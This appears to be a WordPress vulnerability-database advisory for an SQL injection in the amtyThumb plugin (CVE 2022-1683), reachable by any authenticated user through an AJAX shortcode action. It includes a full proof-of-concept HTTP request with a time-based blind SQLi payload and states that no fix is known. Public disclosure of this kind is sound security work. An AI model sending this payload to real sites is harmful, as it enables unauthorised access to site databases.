amtyThumb <= 4.2.0 – Subscriber+ SQLi | CVE 2022-1683 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via its shortcode, leading to an SQL injection and is exploitable by any authenticated user (and not just Author+ like the original advisory mention) due to the fact that they can execute shortcodes via an AJAX action

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 168
Connection: close
Cookie: [any authenticated user]

action=parse-media-shortcode&shortcode=%5bamtyThumbOnly%20percent%3d50%20post_id%3d1%2f**%2fAND%2f**%2f(SELECT%2f**%2f7741%2f**%2fFROM%2f**%2f(SELECT(SLEEP(5)))hlAf)%5d

Affects Plugins

No known fix

References

CVE

URL

https://bulletin.iese.de/post/amtythumb_4-2-0

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)

Submitter

Daniel Krohmer

Submitter website

https://iese.fraunhofer.de/en.html

Verified

Yes

WPVDB ID

359d145b-c365-4e7c-a12e-c26b7b8617ce

Timeline

Publicly Published

2022-05-09 (about 3 years ago)

Added

2022-05-12 (about 3 years ago)

Last Updated

2022-05-13 (about 3 years ago)

Other

Published

Title

Published

2025-05-01

Title

FULL – Cliente 3.1.5 - 3.1.25 - Authenticated (Subscriber+) SQL Injection

Published

2025-01-21

Title

GamiPress < 7.3.2 - Unauthenticated SQL Injection via orderby Parameter

Published

2025-05-16

Title

Video Player & FullScreen Video Background <= 2.4.1 - Authenticated (Administrator+) SQL Injection

Published

2024-08-22

Title

AI Engine < 2.4.8 - Admin+ SQLi

Published

2023-02-06

Title

My Sticky Elements < 2.0.9 - Admin+ SQLi